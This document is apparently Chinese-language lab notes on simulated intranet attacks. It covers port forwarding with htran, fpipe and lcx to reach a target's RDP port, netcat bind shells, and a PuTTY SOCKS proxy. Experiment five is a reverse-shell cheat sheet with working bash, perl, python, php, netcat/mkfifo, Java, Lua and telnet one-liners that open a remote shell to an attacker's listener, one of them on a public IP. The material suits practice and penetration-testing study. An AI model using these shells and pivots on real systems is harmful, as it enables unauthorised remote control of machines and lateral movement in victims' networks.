如题

内网攻击环境模拟（端口转发）

测试工具：

htran3
fpipe
lcx
nc（linux、windows）
bash
python
php
nc 无e
ssh代理

总体环境概况

（总的环境，具体每个工具使用时可能会有所出入）：

攻击机：ubu_ter		192.168.20.149
攻击机：win10		192.168.20.191	192.168.20.76
服务器：ubu_blog	192.168.20.111	192.168.174.11
服务器：server2003	192.168.174.129	192.168.20.181
目标机：Ubuntu2		192.168.174.128
目标机：winXP		192.168.174.130

实验一、使用htran.exe远程登录目标winXP的3389

**环境：**
攻击机（个人笔记本，内网）：Ubuntu2		192.168.20.145
攻击机（VPS，公网）：win10		192.168.20.191	192.168.20.76
服务器（公网，目标内网）：server2003	192.168.174.129	192.168.20.181
目标机（目标内网）：winXP		192.168.174.130

**步骤：**
攻击机win10上执行：htran3.exe -Listen 9999 8888
服务器server2003上执行：htran3.exe -slave 192.168.20.191 9999 192.168.174.130 3389
用法：htr3.exe -slave 攻击机IP 攻击机监听端口 目标机IP 目标机端口
将目标机的3389端口转发到本地的8888端口，使用另一台攻击机Ubuntu2的rdesktop连接win10的8888端口即可

实验二、使用fpipe远程登录目标winXP的3389

**环境：**
攻击机（VPS，公网）：win10		192.168.20.191	192.168.20.76
攻击机（个人笔记本，内网）：Ubuntu2		192.168.20.145
服务器（公网，目标内网）：server2003	192.168.174.129	192.168.20.181
目标机（目标内网）：winXP		192.168.174.130

**步骤：**
在服务器上执行：fpipe.exe -l 1234 -s 1000 -r 3389 192.168.174.130
意思是将发送到服务器本机1000端口的链接通过1234端口被重定向到了目标机IP的3389端口上，然后再链接服务器的1234端口，即可链接到目标机的3389上
然后在攻击机上使用mstsc链接192.168.20.181:1234
疑惑：
在攻击机win10上使用mstsc进行链接，刚建立连接就会断开
在攻击机ubuntu2上使用rdesktop进行链接，成功建立长时间连接

实验三、使用lcx远程登录目标winXP的3389

**环境：**
攻击机（VPS，公网）：win10		192.168.20.191	
攻击机（个人笔记本，内网）：Ubuntu2		192.168.20.145
服务器（公网，目标内网）：server2003	192.168.174.129	192.168.20.181
目标机（目标内网）：winXP		192.168.174.130

**步骤：**
先在win10上：lcx.exe -listen 51 3389
监听51端口，转发到本机的3389端口
然后在服务器上执行：lcx.exe -slave 192.168.20.191 51 192.168.174.130 3389
将目标机winXP的3389转发到攻击机win10（VPS）的51端口上
在攻击机Ubuntu2上：rdesktop 192.168.20.191:3389

实验四、使用nc得到服务器server2003的cmdShell

**环境：**
攻击机：win10		192.168.20.191	
服务器（公网，目标内网）：server2003	192.168.174.129	192.168.20.181
目标机（目标内网）：winXP		192.168.174.130

**步骤：**
在服务器server2003上：nc -l -p 8888 -t -e cmd.exe（-t参数可省略）
在攻击机win10上：nc -nvv  192.168.20.181 8888

实验五、使用nc得到服务器ubu_blog的shell

**环境：**
攻击机：Ubuntu2		192.168.20.145
服务器：ubu_blog	192.168.20.111	192.168.174.11
目标机：Ubuntu2		192.168.174.128

**步骤：**
在攻击机Ubuntu2上：nc -lvv 1234（如果有错再添加0.0.0.0，windows不行，-lvnp也可以）
在服务器ubu_blog上：
（1）bash版本
bash -i >&/dev/tcp/192.168.20.149/1234 0>&1
或： /bin/bash -i > /dev/tcp/192.168.20.149/1234 0<&1 2>&1
（2）perl版本
perl -e 'use Socket;$i="192.168.20.149";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
（3）python版本
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.20.149",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
（4）php版本
php -r '$sock=fsockopen("192.168.20.149",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
（5）nc -e /bin/sh 192.168.20.149 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.20.149 1234 >/tmp/f
nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999
（6）JAVA版本（不会用）
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.20.149/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
（7）LUA版本（尝试失败）
lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.20.149','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
（8）Hacker:nc -lvnp listenport
Victim:mknod /tmp/backpipe p
Victim:/bin/sh 0</tmp/backpipe | nc 192.168.20.149 1234 1>/tmp/backpipe
（9）不使用nc
Method 2:
Hacker: nc -nvlpp8080
Victim: mknod backpipe p && telnet 173.214.173.151 8080 0backpipe
（10）Method 3:（尝试失败）
Hacker: nc -nvlp 8080
Hacker: nc -nvlp 8888
Victim: telnet 192.168.20.149 8080 | /bin/bash | telnet 192.168.20.149 8888

实验六、SSH代理（putty）

**环境：**
代理服务器：ubu_ter	192.168.17.128（仅主机模式，不可上网）
本地机：win10 	192.168.20.191（可上网），192.168.17.1

**步骤：**
打开putty的会话界面，填入主机名称和端口
然后在左侧：连接——》SSH——》通道——》增加端口：7070，动态——》打开
输入用户名和密码，登陆成功
此时打开cmd，输入netstat -an，可以看到这么一条
打开浏览器，在浏览器中设置代理：socks5 127.0.0.1:7070
此时浏览器变得无法上网，设置成功